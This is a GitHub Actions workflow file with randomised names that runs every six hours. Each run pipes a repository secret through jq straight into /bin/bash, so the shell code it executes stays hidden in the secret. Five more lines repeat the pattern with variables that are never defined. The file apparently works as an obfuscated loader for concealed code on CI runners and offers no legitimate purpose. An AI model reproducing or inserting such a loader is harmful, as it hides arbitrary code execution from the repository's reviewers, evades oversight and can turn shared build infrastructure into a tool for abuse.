name: kitdepict

on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kitdepict
        env:
          riif35: ${{ secrets.riif35 }}
        run: |
          echo $riif35 | jq -r .jkx60 | /bin/bash
          echo $gmcve317 | jq -r .v6445 | /bin/bash
          echo $gdw60 | jq -r .vdyno304 | /bin/bash
          echo $rr840 | jq -r .y3 | /bin/bash
          echo $fmnj46 | jq -r .hsnxe1 | /bin/bash
          echo $hsvu591 | jq -r .dq6 | /bin/bash

